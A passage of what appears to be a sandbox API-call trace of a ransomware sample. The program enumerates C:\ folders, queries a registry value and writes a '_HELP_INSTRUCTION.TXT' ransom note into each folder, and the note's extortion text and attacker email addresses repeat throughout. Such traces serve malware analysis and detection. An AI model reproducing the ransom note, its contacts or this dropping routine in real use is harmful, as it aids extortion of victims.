lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0099.377] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0099.377] CreateFileW (lpFileName="C:\\$Recycle.Bin\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\$recycle.bin\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0099.377] CreateFileW (lpFileName="C:\\$Recycle.Bin\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\$recycle.bin\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.377] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x3a5510 [0099.377] PathFindFileNameW (pszPath="C:\\$Recycle.Bin") returned="$Recycle.Bin" [0099.377] lstrcpyW (in: lpString1=0x17e824, lpString2="$Recycle.Bin" | out: lpString1="$Recycle.Bin") returned="$Recycle.Bin" [0099.377] FindClose (in: hFindFile=0x3a5510 | out: hFindFile=0x3a5510) returned 1 [0099.377] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0099.377] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0099.377] lstrcmpW (lpString1="Boot", lpString2="..") returned 1 [0099.378] lstrcmpW (lpString1="Boot", lpString2=".") returned 1 [0099.378] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0099.378] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0099.378] lstrcatW (in: lpString1="C:\\", lpString2="Boot" | out: lpString1="C:\\Boot") returned="C:\\Boot" [0099.378] SetErrorMode (uMode=0x1) returned 0x1 [0099.378] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Boot" | out: lpString1="C:\\Boot") returned="C:\\Boot" [0099.378] lstrcatW (in: lpString1="C:\\Boot", lpString2="\\" | out: lpString1="C:\\Boot\\") returned="C:\\Boot\\" [0099.378] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Boot\\" | out: lpString1="C:\\Boot\\") returned="C:\\Boot\\" [0099.378] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="*.*" | out: lpString1="C:\\Boot\\*.*") returned="C:\\Boot\\*.*" [0099.378] FindFirstFileW (in: lpFileName="C:\\Boot\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x3a5510 [0099.378] PathFindFileNameW (pszPath="C:\\Boot") returned="Boot" [0099.378] lstrcpyW (in: lpString1=0x17e824, lpString2="Boot" | out: lpString1="Boot") returned="Boot" [0099.378] FindClose (in: hFindFile=0x3a5510 | out: hFindFile=0x3a5510) returned 1 [0099.378] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Boot" | out: lpString1="C:\\Boot") returned="C:\\Boot" [0099.378] lstrcatW (in: lpString1="C:\\Boot", lpString2="\\*.*" | out: lpString1="C:\\Boot\\*.*") returned="C:\\Boot\\*.*" [0099.378] StrStrW (lpFirst="C:\\Boot\\", lpSrch="Desktop") returned 0x0 [0099.378] StrStrW (lpFirst="C:\\Boot\\", lpSrch="DESKTOP") returned 0x0 [0099.378] SetErrorMode (uMode=0x1) returned 0x1 [0099.379] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Boot\\_HELP_INSTRUCTION.TXT") returned 29 [0099.379] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0099.379] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0099.380] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x290) returned 0x0 [0099.380] RegQueryValueExW (in: hKey=0x290, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cac608, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3cac608*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0099.380] RegCloseKey (hKey=0x290) returned 0x0 [0099.380] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0099.380] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0099.380] CreateFileW (lpFileName="C:\\Boot\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\boot\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x290 [0099.380] CloseHandle (hObject=0x290) returned 1 [0099.380] FindFirstFileW (in: lpFileName="C:\\Boot\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x3a5510 [0099.380] PathFindFileNameW (pszPath="C:\\Boot") returned="Boot" [0099.380] lstrcpyW (in: lpString1=0x17e824, lpString2="Boot" | out: lpString1="Boot") returned="Boot" [0099.380] FindClose (in: hFindFile=0x3a5510 | out: hFindFile=0x3a5510) returned 1 [0099.381] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0099.381] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0099.381] lstrcmpW (lpString1="Config.Msi", lpString2="..") returned 1 [0099.381] lstrcmpW (lpString1="Config.Msi", lpString2=".") returned 1 [0099.381] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0099.381] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0099.381] lstrcatW (in: lpString1="C:\\", lpString2="Config.Msi" | out: lpString1="C:\\Config.Msi") returned="C:\\Config.Msi" [0099.381] SetErrorMode (uMode=0x1) returned 0x1 [0099.381] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Config.Msi" | out: lpString1="C:\\Config.Msi") returned="C:\\Config.Msi" [0099.381] lstrcatW (in: lpString1="C:\\Config.Msi", lpString2="\\" | out: lpString1="C:\\Config.Msi\\") returned="C:\\Config.Msi\\" [0099.381] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Config.Msi\\" | out: lpString1="C:\\Config.Msi\\") returned="C:\\Config.Msi\\" [0099.381] lstrcatW (in: lpString1="C:\\Config.Msi\\", lpString2="*.*" | out: lpString1="C:\\Config.Msi\\*.*") returned="C:\\Config.Msi\\*.*" [0099.381] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0099.381] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0099.381] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Config.Msi" | out: lpString1="C:\\Config.Msi") returned="C:\\Config.Msi" [0099.381] lstrcatW (in: lpString1="C:\\Config.Msi", lpString2="\\*.*" | out: lpString1="C:\\Config.Msi\\*.*") returned="C:\\Config.Msi\\*.*" [0099.381] StrStrW (lpFirst="C:\\Config.Msi\\", lpSrch="Desktop") returned 0x0 [0099.381] StrStrW (lpFirst="C:\\Config.Msi\\", lpSrch="DESKTOP") returned 0x0 [0099.381] SetErrorMode (uMode=0x1) returned 0x1 [0099.381] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Config.Msi\\_HELP_INSTRUCTION.TXT") returned 35 [0099.381] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0099.382] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0099.382] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x290) returned 0x0 [0099.382] RegQueryValueExW (in: hKey=0x290, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cac838, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3cac838*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0099.382] RegCloseKey (hKey=0x290) returned 0x0 [0099.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0099.382] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0099.382] CreateFileW (lpFileName="C:\\Config.Msi\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\config.msi\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0099.385] CreateFileW (lpFileName="C:\\Config.Msi\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\config.msi\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.385] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0099.385] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0099.385] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0099.385] lstrcmpW (lpString1="Documents and Settings", lpString2="..") returned 1 [0099.385] lstrcmpW (lpString1="Documents and Settings", lpString2=".") returned 1 [0099.385] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0099.385] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0099.385] lstrcatW (in: lpString1="C:\\", lpString2="Documents and Settings" | out: lpString1="C:\\Documents and Settings") returned="C:\\Documents and Settings" [0099.385] SetErrorMode (uMode=0x1) returned 0x1 [0099.386] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Documents and Settings" | out: lpString1="C:\\Documents and Settings") returned="C:\\Documents and Settings" [0099.386] lstrcatW (in: lpString1="C:\\Documents and Settings", lpString2="\\" | out: lpString1="C:\\Documents and Settings\\") returned="C:\\Documents and Settings\\" [0099.386] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Documents and Settings\\" | out: lpString1="C:\\Documents and Settings\\") returned="C:\\Documents and Settings\\" [0099.386] lstrcatW (in: lpString1="C:\\Documents and Settings\\", lpString2="*.*" | out: lpString1="C:\\Documents and Settings\\*.*") returned="C:\\Documents and Settings\\*.*" [0099.386] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0099.386] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0099.386] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Documents and Settings" | out: lpString1="C:\\Documents and Settings") returned="C:\\Documents and Settings" [0099.386] lstrcatW (in: lpString1="C:\\Documents and Settings", lpString2="\\*.*" | out: lpString1="C:\\Documents and Settings\\*.*") returned="C:\\Documents and Settings\\*.*" [0099.386] StrStrW (lpFirst="C:\\Documents and Settings\\", lpSrch="Desktop") returned 0x0 [0099.386] StrStrW (lpFirst="C:\\Documents and Settings\\", lpSrch="DESKTOP") returned 0x0 [0099.386] SetErrorMode (uMode=0x1) returned 0x1 [0099.386] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Documents and Settings\\_HELP_INSTRUCTION.TXT") returned 47 [0099.386] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0099.386] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0099.386] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x290) returned 0x0 [0099.387] RegQueryValueExW (in: hKey=0x290, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3caca68, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3caca68*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0099.387] RegCloseKey (hKey=0x290) returned 0x0 [0099.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0099.387] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0099.387] CreateFileW (lpFileName="C:\\Documents and Settings\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\documents and settings\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x290 [0099.387] CloseHandle (hObject=0x290) returned 1 [0099.387] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0099.387] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0099.387] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0099.387] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0099.387] lstrcmpW (lpString1="MSOCache", lpString2="..") returned 1 [0099.387] lstrcmpW (lpString1="MSOCache", lpString2=".") returned 1 [0099.387] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0099.387] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0099.387] lstrcatW (in: lpString1="C:\\", lpString2="MSOCache" | out: lpString1="C:\\MSOCache") returned="C:\\MSOCache" [0099.388] SetErrorMode (uMode=0x1) returned 0x1 [0099.388] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\MSOCache" | out: lpString1="C:\\MSOCache") returned="C:\\MSOCache" [0099.388] lstrcatW (in: lpString1="C:\\MSOCache", lpString2="\\" | out: lpString1="C:\\MSOCache\\") returned="C:\\MSOCache\\" [0099.388] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\MSOCache\\" | out: lpString1="C:\\MSOCache\\") returned="C:\\MSOCache\\" [0099.388] lstrcatW (in: lpString1="C:\\MSOCache\\", lpString2="*.*" | out: lpString1="C:\\MSOCache\\*.*") returned="C:\\MSOCache\\*.*" [0099.388] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0099.388] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0099.388] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\MSOCache" | out: lpString1="C:\\MSOCache") returned="C:\\MSOCache" [0099.388] lstrcatW (in: lpString1="C:\\MSOCache", lpString2="\\*.*" | out: lpString1="C:\\MSOCache\\*.*") returned="C:\\MSOCache\\*.*" [0099.388] StrStrW (lpFirst="C:\\MSOCache\\", lpSrch="Desktop") returned 0x0 [0099.388] StrStrW (lpFirst="C:\\MSOCache\\", lpSrch="DESKTOP") returned 0x0 [0099.388] SetErrorMode (uMode=0x1) returned 0x1 [0099.388] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\MSOCache\\_HELP_INSTRUCTION.TXT") returned 33 [0099.388] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0099.388] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0099.388] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x290) returned 0x0 [0099.388] RegQueryValueExW (in: hKey=0x290, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cacc98, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3cacc98*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0099.388] RegCloseKey (hKey=0x290) returned 0x0 [0099.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0099.389] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0099.389] CreateFileW (lpFileName="C:\\MSOCache\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\msocache\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0099.389] CreateFileW (lpFileName="C:\\MSOCache\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\msocache\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.389] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0099.389] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0099.389] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0099.389] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0099.389] lstrcmpW (lpString1="PerfLogs", lpString2="..") returned 1 [0099.389] lstrcmpW (lpString1="PerfLogs", lpString2=".") returned 1 [0099.389] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0099.389] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0099.389] lstrcatW (in: lpString1="C:\\", lpString2="PerfLogs" | out: lpString1="C:\\PerfLogs") returned="C:\\PerfLogs" [0099.389] SetErrorMode (uMode=0x1) returned 0x1 [0099.389] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\PerfLogs" | out: lpString1="C:\\PerfLogs") returned="C:\\PerfLogs" [0099.389] lstrcatW (in: lpString1="C:\\PerfLogs", lpString2="\\" | out: lpString1="C:\\PerfLogs\\") returned="C:\\PerfLogs\\" [0099.389] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\PerfLogs\\" | out: lpString1="C:\\PerfLogs\\") returned="C:\\PerfLogs\\" [0099.389] lstrcatW (in: lpString1="C:\\PerfLogs\\", lpString2="*.*" | out: lpString1="C:\\PerfLogs\\*.*") returned="C:\\PerfLogs\\*.*" [0099.389] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0099.389] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0099.389] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\PerfLogs" | out: lpString1="C:\\PerfLogs") returned="C:\\PerfLogs" [0099.390] lstrcatW (in: lpString1="C:\\PerfLogs", lpString2="\\*.*" | out: lpString1="C:\\PerfLogs\\*.*") returned="C:\\PerfLogs\\*.*" [0099.390] StrStrW (lpFirst="C:\\PerfLogs\\", lpSrch="Desktop") returned 0x0 [0099.390] StrStrW (lpFirst="C:\\PerfLogs\\", lpSrch="DESKTOP") returned 0x0 [0099.390] SetErrorMode (uMode=0x1) returned 0x1 [0099.390] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\PerfLogs\\_HELP_INSTRUCTION.TXT") returned 33 [0099.390] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0099.390] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0099.390] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x290) returned 0x0 [0099.390] RegQueryValueExW (in: hKey=0x290, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cacec8, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3cacec8*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0099.390] RegCloseKey (hKey=0x290) returned 0x0 [0099.390] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0099.390] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as 